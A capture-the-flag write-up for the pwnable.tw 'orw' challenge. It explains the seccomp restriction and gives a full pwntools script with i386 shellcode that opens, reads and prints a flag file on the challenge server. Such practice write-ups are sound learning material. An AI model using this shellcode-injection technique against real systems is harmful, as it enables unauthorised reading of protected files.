x64.moe

pwnable.tw orw Writeup

October 12, 2019

Read the flag from /home/orw/flag. Only open read write syscall are allowed to use.

Environment

$ uname -a
Linux base-debootstrap 4.4.0-159-generic #187-Ubuntu SMP Thu Aug 1 16:28:06 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Findings

This file is 32bit ELF file.

$ file ./orw 
./orw: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 2.6.32, BuildID[sha1]=e60ecccd9d01c8217387e8b77e9261a1f36b5030, not stripped

Disassemble result.

This file read shellcode and execute it, but since seccomp is used, system calls other than open, read, and write cannot be used. So we need write shellcode that only used open, read, and write.

Writeup

I wrote shellcode that only used open, read, write syscalls. (Reffer: https://syscalls.kernelgrok.com/ )

from pwn import *

HOST = 'chall.pwnable.tw'
PORT = 10001

context(os='linux', arch='i386')
context.log_level = 'debug'

shell_code = asm('\n'.join([
    'push %d' % u32('ag\0\0'),
    'push %d' % u32('w/fl'),
    'push %d' % u32('e/or'),
    'push %d' % u32('/hom'), # Flag path
    'mov edx, 0', # Mode
    'mov ecx, 0', # Open syscall flag
    'mov ebx, esp', # Buffer
    'mov eax, 5', # Open syscall number
    'int 0x80',

    'mov edx, 128', # Count
    'mov ecx, esp', # Buffer
    'mov ebx, eax', # fd
    'mov eax, 3', # Read syscall number
    'int 0x80',

    'mov edx, eax', # Count
    'mov ecx, esp', # Buffer
    'mov ebx, 0', # fd
    'mov eax, 4', # Write syscall number
    'int 0x80',
]))

# for executing code on remote or local
if len(sys.argv) > 1 and sys.argv[1] == '-r':
    conn = remote(HOST, PORT)
else:
    conn = process('./orw')

log.info('Pwning start')
conn.recvuntil("Give my your shellcode:")
conn.sendline(shell_code)
conn.recvall()

FAMASoon

Written by FAMASoon. Twitter/GitHub